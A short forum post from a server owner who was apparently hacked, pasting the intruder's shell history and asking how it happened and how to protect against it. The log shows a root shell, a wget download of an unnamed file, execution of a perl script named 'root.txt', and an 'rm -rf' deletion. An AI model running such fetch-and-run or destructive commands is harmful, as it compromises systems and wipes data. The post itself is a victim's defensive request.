Hi everyone,
My server has been hacked.
I noticed that I couldn't access its files remotely, so had a closer look. There were no files in my home folder.
I looked at the log of commands, and this is what I found.
sudo su
pwd
ls -a
w
id
uname -a
wget <some file>
unzip root.txt.zip
perl root.txt
ls
id
rm -rf*
exit -0
Does anyone have any advice? How did they get my password after inputting 'sudo su'? Should I reinstall the OS? Is there anything I can do to safeguard against this in the future? Is this a bot or human?
I know it's too late this time, but I don't want this to happen again, to me or anyone.
All comments appreciated.
Thanks
Bookmarks